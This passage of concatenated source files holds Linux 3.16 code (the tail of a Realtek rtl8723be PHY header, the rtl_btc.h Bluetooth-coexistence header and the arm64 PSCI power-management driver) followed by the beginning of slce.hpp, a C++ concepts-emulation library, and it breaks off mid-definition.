ANTENNA_AB,
ANTENNA_ABD,
ANTENNA_ABC,
ANTENNA_ABCD
};
struct r_antenna_select_ofdm {
u32 r_tx_antenna:4;
u32 r_ant_l:4;
u32 r_ant_non_ht:4;
u32 r_ant_ht1:4;
u32 r_ant_ht2:4;
u32 r_ant_ht_s1:4;
u32 r_ant_non_ht_s1:4;
u32 ofdm_txsc:2;
u32 reserved:2;
};
struct r_antenna_select_cck {
u8 r_cckrx_enable_2:2;
u8 r_cckrx_enable:2;
u8 r_ccktx_enable:4;
};
struct efuse_contents {
u8 mac_addr[ETH_ALEN];
u8 cck_tx_power_idx[6];
u8 ht40_1s_tx_power_idx[6];
u8 ht40_2s_tx_power_idx_diff[3];
u8 ht20_tx_power_idx_diff[3];
u8 ofdm_tx_power_idx_diff[3];
u8 ht40_max_power_offset[3];
u8 ht20_max_power_offset[3];
u8 channel_plan;
u8 thermal_meter;
u8 rf_option[5];
u8 version;
u8 oem_id;
u8 regulatory;
};
struct tx_power_struct {
u8 cck[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 ht40_1s[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 ht40_2s[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 ht20_diff[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 legacy_ht_diff[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 legacy_ht_txpowerdiff;
u8 groupht20[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 groupht40[RTL92C_MAX_PATH_NUM][CHANNEL_MAX_NUMBER];
u8 pwrgroup_cnt;
u32 mcs_original_offset[4][16];
};
enum _ANT_DIV_TYPE {
NO_ANTDIV = 0xFF,
CG_TRX_HW_ANTDIV = 0x01,
CGCS_RX_HW_ANTDIV = 0x02,
FIXED_HW_ANTDIV = 0x03,
CG_TRX_SMART_ANTDIV = 0x04,
CGCS_RX_SW_ANTDIV = 0x05,
};
u32 rtl8723be_phy_query_rf_reg(struct ieee80211_hw *hw,
enum radio_path rfpath,
u32 regaddr, u32 bitmask);
void rtl8723be_phy_set_rf_reg(struct ieee80211_hw *hw,
enum radio_path rfpath,
u32 regaddr, u32 bitmask, u32 data);
bool rtl8723be_phy_mac_config(struct ieee80211_hw *hw);
bool rtl8723be_phy_bb_config(struct ieee80211_hw *hw);
bool rtl8723be_phy_rf_config(struct ieee80211_hw *hw);
void rtl8723be_phy_get_hw_reg_originalvalue(struct ieee80211_hw *hw);
void rtl8723be_phy_get_txpower_level(struct ieee80211_hw *hw,
long *powerlevel);
void rtl8723be_phy_set_txpower_level(struct ieee80211_hw *hw,
u8 channel);
void rtl8723be_phy_scan_operation_backup(struct ieee80211_hw *hw,
u8 operation);
void rtl8723be_phy_set_bw_mode_callback(struct ieee80211_hw *hw);
void rtl8723be_phy_set_bw_mode(struct ieee80211_hw *hw,
enum nl80211_channel_type ch_type);
void rtl8723be_phy_sw_chnl_callback(struct ieee80211_hw *hw);
u8 rtl8723be_phy_sw_chnl(struct ieee80211_hw *hw);
void rtl8723be_phy_iq_calibrate(struct ieee80211_hw *hw,
bool b_recovery);
void rtl23b_phy_ap_calibrate(struct ieee80211_hw *hw, char delta);
void rtl8723be_phy_lc_calibrate(struct ieee80211_hw *hw);
void rtl8723be_phy_set_rfpath_switch(struct ieee80211_hw *hw, bool bmain);
bool rtl8723be_phy_config_rf_with_headerfile(struct ieee80211_hw *hw,
enum radio_path rfpath);
bool rtl8723be_phy_set_io_cmd(struct ieee80211_hw *hw, enum io_type iotype);
bool rtl8723be_phy_set_rf_power_state(struct ieee80211_hw *hw,
enum rf_pwrstate rfpwr_state);
#endif
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/btcoexist/rtl_btc.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2010 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#ifndef __RTL_BTC_H__
#define __RTL_BTC_H__
#include "halbt_precomp.h"
void rtl_btc_init_variables(struct rtl_priv *rtlpriv);
void rtl_btc_init_hal_vars(struct rtl_priv *rtlpriv);
void rtl_btc_init_hw_config(struct rtl_priv *rtlpriv);
void rtl_btc_ips_notify(struct rtl_priv *rtlpriv, u8 type);
void rtl_btc_scan_notify(struct rtl_priv *rtlpriv, u8 scantype);
void rtl_btc_connect_notify(struct rtl_priv *rtlpriv, u8 action);
void rtl_btc_mediastatus_notify(struct rtl_priv *rtlpriv,
enum _RT_MEDIA_STATUS mstatus);
void rtl_btc_periodical(struct rtl_priv *rtlpriv);
void rtl_btc_halt_notify(void);
void rtl_btc_btinfo_notify(struct rtl_priv *rtlpriv, u8 *tmpbuf, u8 length);
bool rtl_btc_is_limited_dig(struct rtl_priv *rtlpriv);
bool rtl_btc_is_disable_edca_turbo(struct rtl_priv *rtlpriv);
bool rtl_btc_is_bt_disabled(struct rtl_priv *rtlpriv);
struct rtl_btc_ops *rtl_btc_get_ops_pointer(void);
u8 rtl_get_hwpg_ant_num(struct rtl_priv *rtlpriv);
u8 rtl_get_hwpg_bt_exist(struct rtl_priv *rtlpriv);
u8 rtl_get_hwpg_bt_type(struct rtl_priv *rtlpriv);
enum _RT_MEDIA_STATUS mgnt_link_status_query(struct ieee80211_hw *hw);
#endif
<|start_filename|>linux-3.16/arch/arm64/kernel/psci.c<|end_filename|>
/*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* Copyright (C) 2013 ARM Limited
*
* Author: <NAME> <<EMAIL>>
*/
#define pr_fmt(fmt) "psci: " fmt
#include <linux/init.h>
#include <linux/of.h>
#include <linux/smp.h>
#include <linux/reboot.h>
#include <linux/pm.h>
#include <linux/delay.h>
#include <uapi/linux/psci.h>
#include <asm/compiler.h>
#include <asm/cpu_ops.h>
#include <asm/errno.h>
#include <asm/psci.h>
#include <asm/smp_plat.h>
#include <asm/system_misc.h>
#define PSCI_POWER_STATE_TYPE_STANDBY 0
#define PSCI_POWER_STATE_TYPE_POWER_DOWN 1
struct psci_power_state {
u16 id;
u8 type;
u8 affinity_level;
};
struct psci_operations {
int (*cpu_suspend)(struct psci_power_state state,
unsigned long entry_point);
int (*cpu_off)(struct psci_power_state state);
int (*cpu_on)(unsigned long cpuid, unsigned long entry_point);
int (*migrate)(unsigned long cpuid);
int (*affinity_info)(unsigned long target_affinity,
unsigned long lowest_affinity_level);
int (*migrate_info_type)(void);
};
static struct psci_operations psci_ops;
static int (*invoke_psci_fn)(u64, u64, u64, u64);
typedef int (*psci_initcall_t)(const struct device_node *);
enum psci_function {
PSCI_FN_CPU_SUSPEND,
PSCI_FN_CPU_ON,
PSCI_FN_CPU_OFF,
PSCI_FN_MIGRATE,
PSCI_FN_AFFINITY_INFO,
PSCI_FN_MIGRATE_INFO_TYPE,
PSCI_FN_MAX,
};
static u32 psci_function_id[PSCI_FN_MAX];
static int psci_to_linux_errno(int errno)
{
switch (errno) {
case PSCI_RET_SUCCESS:
return 0;
case PSCI_RET_NOT_SUPPORTED:
return -EOPNOTSUPP;
case PSCI_RET_INVALID_PARAMS:
return -EINVAL;
case PSCI_RET_DENIED:
return -EPERM;
};
return -EINVAL;
}
static u32 psci_power_state_pack(struct psci_power_state state)
{
return ((state.id << PSCI_0_2_POWER_STATE_ID_SHIFT)
& PSCI_0_2_POWER_STATE_ID_MASK) |
((state.type << PSCI_0_2_POWER_STATE_TYPE_SHIFT)
& PSCI_0_2_POWER_STATE_TYPE_MASK) |
((state.affinity_level << PSCI_0_2_POWER_STATE_AFFL_SHIFT)
& PSCI_0_2_POWER_STATE_AFFL_MASK);
}
/*
* The following two functions are invoked via the invoke_psci_fn pointer
* and will not be inlined, allowing us to piggyback on the AAPCS.
*/
static noinline int __invoke_psci_fn_hvc(u64 function_id, u64 arg0, u64 arg1,
u64 arg2)
{
asm volatile(
__asmeq("%0", "x0")
__asmeq("%1", "x1")
__asmeq("%2", "x2")
__asmeq("%3", "x3")
"hvc #0\n"
: "+r" (function_id)
: "r" (arg0), "r" (arg1), "r" (arg2));
return function_id;
}
static noinline int __invoke_psci_fn_smc(u64 function_id, u64 arg0, u64 arg1,
u64 arg2)
{
asm volatile(
__asmeq("%0", "x0")
__asmeq("%1", "x1")
__asmeq("%2", "x2")
__asmeq("%3", "x3")
"smc #0\n"
: "+r" (function_id)
: "r" (arg0), "r" (arg1), "r" (arg2));
return function_id;
}
static int psci_get_version(void)
{
int err;
err = invoke_psci_fn(PSCI_0_2_FN_PSCI_VERSION, 0, 0, 0);
return err;
}
static int psci_cpu_suspend(struct psci_power_state state,
unsigned long entry_point)
{
int err;
u32 fn, power_state;
fn = psci_function_id[PSCI_FN_CPU_SUSPEND];
power_state = psci_power_state_pack(state);
err = invoke_psci_fn(fn, power_state, entry_point, 0);
return psci_to_linux_errno(err);
}
static int psci_cpu_off(struct psci_power_state state)
{
int err;
u32 fn, power_state;
fn = psci_function_id[PSCI_FN_CPU_OFF];
power_state = psci_power_state_pack(state);
err = invoke_psci_fn(fn, power_state, 0, 0);
return psci_to_linux_errno(err);
}
static int psci_cpu_on(unsigned long cpuid, unsigned long entry_point)
{
int err;
u32 fn;
fn = psci_function_id[PSCI_FN_CPU_ON];
err = invoke_psci_fn(fn, cpuid, entry_point, 0);
return psci_to_linux_errno(err);
}
static int psci_migrate(unsigned long cpuid)
{
int err;
u32 fn;
fn = psci_function_id[PSCI_FN_MIGRATE];
err = invoke_psci_fn(fn, cpuid, 0, 0);
return psci_to_linux_errno(err);
}
static int psci_affinity_info(unsigned long target_affinity,
unsigned long lowest_affinity_level)
{
int err;
u32 fn;
fn = psci_function_id[PSCI_FN_AFFINITY_INFO];
err = invoke_psci_fn(fn, target_affinity, lowest_affinity_level, 0);
return err;
}
static int psci_migrate_info_type(void)
{
int err;
u32 fn;
fn = psci_function_id[PSCI_FN_MIGRATE_INFO_TYPE];
err = invoke_psci_fn(fn, 0, 0, 0);
return err;
}
static int get_set_conduit_method(struct device_node *np)
{
const char *method;
pr_info("probing for conduit method from DT.\n");
if (of_property_read_string(np, "method", &method)) {
pr_warn("missing \"method\" property\n");
return -ENXIO;
}
if (!strcmp("hvc", method)) {
invoke_psci_fn = __invoke_psci_fn_hvc;
} else if (!strcmp("smc", method)) {
invoke_psci_fn = __invoke_psci_fn_smc;
} else {
pr_warn("invalid \"method\" property: %s\n", method);
return -EINVAL;
}
return 0;
}
static void psci_sys_reset(enum reboot_mode reboot_mode, const char *cmd)
{
invoke_psci_fn(PSCI_0_2_FN_SYSTEM_RESET, 0, 0, 0);
}
static void psci_sys_poweroff(void)
{
invoke_psci_fn(PSCI_0_2_FN_SYSTEM_OFF, 0, 0, 0);
}
/*
* PSCI Function IDs for v0.2+ are well defined so use
* standard values.
*/
static int psci_0_2_init(struct device_node *np)
{
int err, ver;
err = get_set_conduit_method(np);
if (err)
goto out_put_node;
ver = psci_get_version();
if (ver == PSCI_RET_NOT_SUPPORTED) {
/* PSCI v0.2 mandates implementation of PSCI_ID_VERSION. */
pr_err("PSCI firmware does not comply with the v0.2 spec.\n");
err = -EOPNOTSUPP;
goto out_put_node;
} else {
pr_info("PSCIv%d.%d detected in firmware.\n",
PSCI_VERSION_MAJOR(ver),
PSCI_VERSION_MINOR(ver));
if (PSCI_VERSION_MAJOR(ver) == 0 &&
PSCI_VERSION_MINOR(ver) < 2) {
err = -EINVAL;
pr_err("Conflicting PSCI version detected.\n");
goto out_put_node;
}
}
pr_info("Using standard PSCI v0.2 function IDs\n");
psci_function_id[PSCI_FN_CPU_SUSPEND] = PSCI_0_2_FN64_CPU_SUSPEND;
psci_ops.cpu_suspend = psci_cpu_suspend;
psci_function_id[PSCI_FN_CPU_OFF] = PSCI_0_2_FN_CPU_OFF;
psci_ops.cpu_off = psci_cpu_off;
psci_function_id[PSCI_FN_CPU_ON] = PSCI_0_2_FN64_CPU_ON;
psci_ops.cpu_on = psci_cpu_on;
psci_function_id[PSCI_FN_MIGRATE] = PSCI_0_2_FN64_MIGRATE;
psci_ops.migrate = psci_migrate;
psci_function_id[PSCI_FN_AFFINITY_INFO] = PSCI_0_2_FN64_AFFINITY_INFO;
psci_ops.affinity_info = psci_affinity_info;
psci_function_id[PSCI_FN_MIGRATE_INFO_TYPE] =
PSCI_0_2_FN_MIGRATE_INFO_TYPE;
psci_ops.migrate_info_type = psci_migrate_info_type;
arm_pm_restart = psci_sys_reset;
pm_power_off = psci_sys_poweroff;
out_put_node:
of_node_put(np);
return err;
}
/*
* PSCI < v0.2 get PSCI Function IDs via DT.
*/
static int psci_0_1_init(struct device_node *np)
{
u32 id;
int err;
err = get_set_conduit_method(np);
if (err)
goto out_put_node;
pr_info("Using PSCI v0.1 Function IDs from DT\n");
if (!of_property_read_u32(np, "cpu_suspend", &id)) {
psci_function_id[PSCI_FN_CPU_SUSPEND] = id;
psci_ops.cpu_suspend = psci_cpu_suspend;
}
if (!of_property_read_u32(np, "cpu_off", &id)) {
psci_function_id[PSCI_FN_CPU_OFF] = id;
psci_ops.cpu_off = psci_cpu_off;
}
if (!of_property_read_u32(np, "cpu_on", &id)) {
psci_function_id[PSCI_FN_CPU_ON] = id;
psci_ops.cpu_on = psci_cpu_on;
}
if (!of_property_read_u32(np, "migrate", &id)) {
psci_function_id[PSCI_FN_MIGRATE] = id;
psci_ops.migrate = psci_migrate;
}
out_put_node:
of_node_put(np);
return err;
}
static const struct of_device_id psci_of_match[] __initconst = {
{ .compatible = "arm,psci", .data = psci_0_1_init},
{ .compatible = "arm,psci-0.2", .data = psci_0_2_init},
{},
};
int __init psci_init(void)
{
struct device_node *np;
const struct of_device_id *matched_np;
psci_initcall_t init_fn;
np = of_find_matching_node_and_match(NULL, psci_of_match, &matched_np);
if (!np)
return -ENODEV;
init_fn = (psci_initcall_t)matched_np->data;
return init_fn(np);
}
#ifdef CONFIG_SMP
static int __init cpu_psci_cpu_init(struct device_node *dn, unsigned int cpu)
{
return 0;
}
static int __init cpu_psci_cpu_prepare(unsigned int cpu)
{
if (!psci_ops.cpu_on) {
pr_err("no cpu_on method, not booting CPU%d\n", cpu);
return -ENODEV;
}
return 0;
}
static int cpu_psci_cpu_boot(unsigned int cpu)
{
int err = psci_ops.cpu_on(cpu_logical_map(cpu), __pa(secondary_entry));
if (err)
pr_err("failed to boot CPU%d (%d)\n", cpu, err);
return err;
}
#ifdef CONFIG_HOTPLUG_CPU
static int cpu_psci_cpu_disable(unsigned int cpu)
{
/* Fail early if we don't have CPU_OFF support */
if (!psci_ops.cpu_off)
return -EOPNOTSUPP;
return 0;
}
static void cpu_psci_cpu_die(unsigned int cpu)
{
int ret;
/*
* There are no known implementations of PSCI actually using the
* power state field, pass a sensible default for now.
*/
struct psci_power_state state = {
.type = PSCI_POWER_STATE_TYPE_POWER_DOWN,
};
ret = psci_ops.cpu_off(state);
pr_crit("unable to power off CPU%u (%d)\n", cpu, ret);
}
static int cpu_psci_cpu_kill(unsigned int cpu)
{
int err, i;
if (!psci_ops.affinity_info)
return 1;
/*
* cpu_kill could race with cpu_die and we can
* potentially end up declaring this cpu undead
* while it is dying. So, try again a few times.
*/
for (i = 0; i < 10; i++) {
err = psci_ops.affinity_info(cpu_logical_map(cpu), 0);
if (err == PSCI_0_2_AFFINITY_LEVEL_OFF) {
pr_info("CPU%d killed.\n", cpu);
return 1;
}
msleep(10);
pr_info("Retrying again to check for CPU kill\n");
}
pr_warn("CPU%d may not have shut down cleanly (AFFINITY_INFO reports %d)\n",
cpu, err);
/* Make op_cpu_kill() fail. */
return 0;
}
#endif
const struct cpu_operations cpu_psci_ops = {
.name = "psci",
.cpu_init = cpu_psci_cpu_init,
.cpu_prepare = cpu_psci_cpu_prepare,
.cpu_boot = cpu_psci_cpu_boot,
#ifdef CONFIG_HOTPLUG_CPU
.cpu_disable = cpu_psci_cpu_disable,
.cpu_die = cpu_psci_cpu_die,
.cpu_kill = cpu_psci_cpu_kill,
#endif
};
#endif
| jj1232727/system_call |
<|start_filename|>include/slce/slce.hpp<|end_filename|>
/*
* Copyright (c) 2019 <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
#ifndef SLCE_STANDARD_LIBRARY_CONCEPTS_EMULATION_LIBRARY_HPP
#define SLCE_STANDARD_LIBRARY_CONCEPTS_EMULATION_LIBRARY_HPP
#include <type_traits>
#include <iterator>
#ifdef __cpp_lib_ranges
#include <range>
#endif
#ifdef __cpp_variable_templates
#define SLCE_ENABLE_CXX14
#ifdef __cpp_concepts
#define SLCE_ENABLE_CONCEPTS_TS
#endif
#endif
#if __cplusplus > 201703L && !defined(SLCE_ENABLE_CONCEPTS_TS)
#define SLCE_ENABLE_CXX20
#endif
#ifdef SLCE_ENABLE_CONCEPTS_TS
#define SLCE_BOOL bool
#define SLCE_ENABLE_CONCEPTS
#elif defined( SLCE_ENABLE_CXX20 )
#define SLCE_BOOL
#define SLCE_ENABLE_CONCEPTS
#endif
#if defined(SLCE_ENABLE_CXX14) && !defined(SLCE_ENABLE_CONCEPTS)
#define SLCE_HELPER( concept_name, trait_name ) \
template< typename ...Args > \
constexpr bool trait_name ## _v = trait_name < Args... >::value;
#elif !defined(SLCE_ENABLE_CXX14) && defined(SLCE_ENABLE_CONCEPTS)
#define SLCE_HELPER( concept_name, trait_name ) \
template< typename ...Args > \
concept SLCE_BOOL concept_name = trait_name < Args... >::value;
#elif defined(SLCE_ENABLE_CXX14) && defined(SLCE_ENABLE_CONCEPTS)
#define SLCE_HELPER( concept_name, trait_name ) \
template< typename ...Args > \
constexpr bool trait_name ## _v = trait_name < Args... >::value; \
template< typename ...Args > \
concept SLCE_BOOL concept_name = trait_name < Args... >::value;
#else
#define SLCE_HELPER( concept_name, trait_name )
#endif
#if defined(SLCE_ENABLE_CXX14)
#define SLCE_BOOLEAN_TRAIT_V( trait_name, ... ) \
template< typename T, typename Enable = void > \
struct trait_name : public std::false_type {}; \
template< typename T > \
struct trait_name< T, typename std::enable_if< __VA_ARGS__ >::type > : public std::true_type {}; \
template< typename T > \
using trait_name ## _t = typename trait_name < T >::type; \
template< typename T > \
constexpr bool trait_name ## _v = trait_name < T >::value;
#define SLCE_BOOLEAN_TRAIT_T1( trait_name, ... ) \
template< typename T, typename Enable = void > \
struct trait_name : public std::false_type {}; \
template< typename T > \
struct trait_name< T, typename slce::detail::voider< __VA_ARGS__ >::type > : public std::true_type {}; \
template< typename T > \
using trait_name ## _t = typename trait_name < T >::type; \
template< typename T > \
constexpr bool trait_name ## _v = trait_name < T >::value;
#define SLCE_BOOLEAN_TRAIT_T2( trait_name, ... ) \
template< typename T, typename U, typename Enable = void > \
struct trait_name : public std::false_type {}; \
template< typename T, typename U > \
struct trait_name< T, U, typename slce::detail::voider< __VA_ARGS__ >::type > : public std::true_type {}; \
template< typename T, typename U > \
using trait_name ## _t = typename trait_name < T, U >::type; \
template< typename T, typename U > \
constexpr bool trait_name ## _v = trait_name < T, U >::value;
#else
#define SLCE_BOOLEAN_TRAIT_V( trait_name, ... ) \
template< typename T, typename Enable = void > \
struct trait_name : public std::false_type {}; \
template< typename T > \
struct trait_name< T, typename std::enable_if< __VA_ARGS__ >::type > : public std::true_type {}; \
template< typename T > \
using trait_name ## _t = typename trait_name < T >::type;
#define SLCE_BOOLEAN_TRAIT_T1( trait_name, ... ) \
template< typename T, typename Enable = void > \
struct trait_name : public std::false_type {}; \
template< typename T > \
struct trait_name< T, typename slce::detail::voider< __VA_ARGS__ >::type > : public std::true_type {}; \
template< typename T > \
using trait_name ## _t = typename trait_name < T >::type;
#define SLCE_BOOLEAN_TRAIT_T2( trait_name, ... ) \
template< typename T, typename U, typename Enable = void > \
struct trait_name : public std::false_type {}; \
template< typename T, typename U > \
struct trait_name< T, U, typename slce::detail::voider< __VA_ARGS__ >::type > : public std::true_type {}; \
template< typename T, typename U > \
using trait_name ## _t = typename trait_name < T, U >::type;
#endif
namespace std {
template< typename T, typename U, template< class > class Tq, template< class > class Uq >
struct basic_common_reference;
}
namespace slce {
namespace detail {
template< typename ...Args >
struct voider {
using type = void;
};
template< typename ...Args >
struct lifter {};
template< typename T >
struct remove_cvref {
using type = typename std::remove_cv< typename std::remove_reference< T >::type >::type;
};
template< typename T >
using add_no_qual_t = T;
template< typename T >
using add_c_qual_t = const T;
template< typename T >
using add_v_qual_t = volatile T;
template< typename T >
using add_l_qual_t = T&;
template< typename T >
using add_r_qual_t = T&&;
template< typename T >
using add_cv_qual_t = add_c_qual_t< add_v_qual_t< T > >;
template< typename T >
using add_cl_qual_t = add_c_qual_t< add_l_qual_t< T > >;
template< typename T >
using add_cr_qual_t = add_c_qual_t< add_r_qual_t< T > >;
template< typename T >
using add_vl_qual_t = add_v_qual_t< add_l_qual_t< T > >;
template< typename T >
using add_vr_qual_t = add_v_qual_t< add_r_qual_t< T > >;
template< typename T >
using add_cvl_qual_t = add_c_qual_t< add_v_qual_t< add_l_qual_t< T > > >;
template< typename T >
using add_cvr_qual_t = add_c_qual_t< add_v_qual_t< add_r_qual_t< T > > >;
SLCE_BOOLEAN_TRAIT_V(
has_no_qual,
!std::is_const< T >::value &&
!std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_c_qual,
std::is_const< T >::value &&
!std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_v_qual,
!std::is_const< T >::value &&
std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_l_qual,
!std::is_const< T >::value &&
!std::is_volatile< T >::value &&
std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_r_qual,
!std::is_const< T >::value &&
!std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_cv_qual,
std::is_const< T >::value &&
std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_cl_qual,
std::is_const< T >::value &&
!std::is_volatile< T >::value &&
std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_cr_qual,
std::is_const< T >::value &&
!std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_vl_qual,
!std::is_const< T >::value &&
std::is_volatile< T >::value &&
std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_vr_qual,
!std::is_const< T >::value &&
std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_cvl_qual,
std::is_const< T >::value &&
std::is_volatile< T >::value &&
std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_cvr_qual,
std::is_const< T >::value &&
std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
std::is_rvalue_reference< T >::value
)
template< typename T, typename U >
struct copy_cvr {
using type = U;
};
template< typename T, typename U >
struct copy_cvr< T&, U > {
using type = U&;
};
template< typename T, typename U >
struct copy_cvr< T&&, U > {
using type = U&&;
};
template< typename T, typename U >
struct copy_cvr< const T, U > {
using type = const U;
};
template< typename T, typename U >
struct copy_cvr< const T&, U > {
using type = const U&;
};
template< typename T, typename U >
struct copy_cvr< const T&&, U > {
using type = const U&&;
};
template< typename T, typename U >
struct copy_cvr< volatile T, U > {
using type = volatile U;
};
template< typename T, typename U >
struct copy_cvr< volatile T&, U > {
using type = volatile U&;
};
template< typename T, typename U >
struct copy_cvr< volatile T&&, U > {
using type = volatile U&&;
};
template< typename T, typename U >
struct copy_cvr< const volatile T, U > {
using type = const volatile U;
};
template< typename T, typename U >
struct copy_cvr< const volatile T&, U > {
using type = const volatile U&;
};
template< typename T, typename U >
struct copy_cvr< const volatile T&&, U > {
using type = const volatile U&&;
};
}
template< typename T, typename U >
using is_same = std::is_same< T, U >;
SLCE_HELPER( Same, is_same )
template< typename Derived, typename Base, typename Enable = void >
struct is_derived_from : public std::false_type {};
template< typename Derived, typename Base >
struct is_derived_from< Derived, Base, typename std::enable_if<
!std::is_reference< Derived >::value && !std::is_reference< Base >::value
>::type > : public std::integral_constant<
bool, std::is_base_of< Base, Derived >::value && std::is_convertible< const volatile Derived*, const volatile Base* >::value
> {};
SLCE_HELPER( DerivedFrom, is_derived_from )
template< typename T, typename U, typename Enable = void >
struct is_convertible_to : public std::false_type {};
template< typename T, typename U >
struct is_convertible_to< T, U, typename detail::voider<
decltype( static_cast< U >( std::declval< T >() ) )
>::type > : public std::is_convertible< T, U > {};
SLCE_HELPER( ConvertibleTo, is_convertible_to )
namespace detail {
template< typename T, typename U, typename Enable = void >
struct common_lvalue_reference {};
template< typename T, typename U >
struct common_lvalue_reference< T, U, typename voider<
decltype( false ? std::declval< typename remove_cvref< T >::type& >() : std::declval< typename remove_cvref< U >::type& >() )
>::type > {
using type = decltype( false ? std::declval< typename copy_cvr< U, T >::type& >() : std::declval< typename copy_cvr< T, U >::type& >() );
};
SLCE_BOOLEAN_TRAIT_T2(
has_common_lvalue_reference,
typename common_lvalue_reference< T, U >::type
)
template< typename T, typename U, typename Enable = void >
struct common_rvalue_reference {};
template< typename T, typename U >
struct common_rvalue_reference< T, U, typename voider< typename common_lvalue_reference< T, U >::type >::type > {
using type = typename std::remove_reference<
typename common_lvalue_reference< T, U >::type
>::type&&;
};
SLCE_BOOLEAN_TRAIT_T2(
has_common_rvalue_reference,
typename common_rvalue_reference< T, U >::type
)
template< typename T, typename U, typename Enable = void >
struct common_const_reference {};
template< typename T, typename U >
struct common_const_reference< T, U, typename voider< typename common_lvalue_reference< T, const typename remove_cvref< U >::type >::type >::type > {
using type = typename std::remove_reference< typename common_lvalue_reference< T, const typename remove_cvref< U >::type >::type >::type&&;
};
SLCE_BOOLEAN_TRAIT_T2(
has_common_const_reference,
typename common_const_reference< T, U >::type
)
template< typename T, typename U, typename Enable = void >
struct simple_common_reference_type {};
template< typename T, typename U >
struct simple_common_reference_type< T, U, typename std::enable_if<
std::is_lvalue_reference< T >::value &&
std::is_lvalue_reference< U >::value &&
std::is_lvalue_reference< typename common_lvalue_reference< T, U >::type >::value
>::type > {
using type = typename common_lvalue_reference< T, U >::type;
};
template< typename T, typename U >
struct simple_common_reference_type< T, U, typename std::enable_if<
std::is_rvalue_reference< T >::value &&
std::is_rvalue_reference< U >::value &&
is_convertible_to< T, typename common_rvalue_reference< T, U >::type >::value &&
is_convertible_to< U, typename common_rvalue_reference< T, U >::type >::value
>::type > {
using type = typename common_rvalue_reference< T, U >::type;
};
template< typename T, typename U >
struct simple_common_reference_type< T, U, typename std::enable_if<
std::is_lvalue_reference< T >::value &&
std::is_rvalue_reference< U >::value &&
is_convertible_to< T, typename common_const_reference< T, U >::type >::value &&
is_convertible_to< U, typename common_const_reference< T, U >::type >::value
>::type > {
using type = typename common_rvalue_reference< T, U >::type;
};
template< typename T, typename U >
struct simple_common_reference_type< U, T, typename std::enable_if<
std::is_lvalue_reference< T >::value &&
std::is_rvalue_reference< U >::value &&
is_convertible_to< T, typename common_const_reference< T, U >::type >::value &&
is_convertible_to< U, typename common_const_reference< T, U >::type >::value
>::type > {
using type = typename common_rvalue_reference< T, U >::type;
};
SLCE_BOOLEAN_TRAIT_T2(
has_simple_common_reference_type,
typename simple_common_reference_type< T, U >::type
)
template< typename T, typename U, typename Enable = void >
struct basic_common_reference_type {};
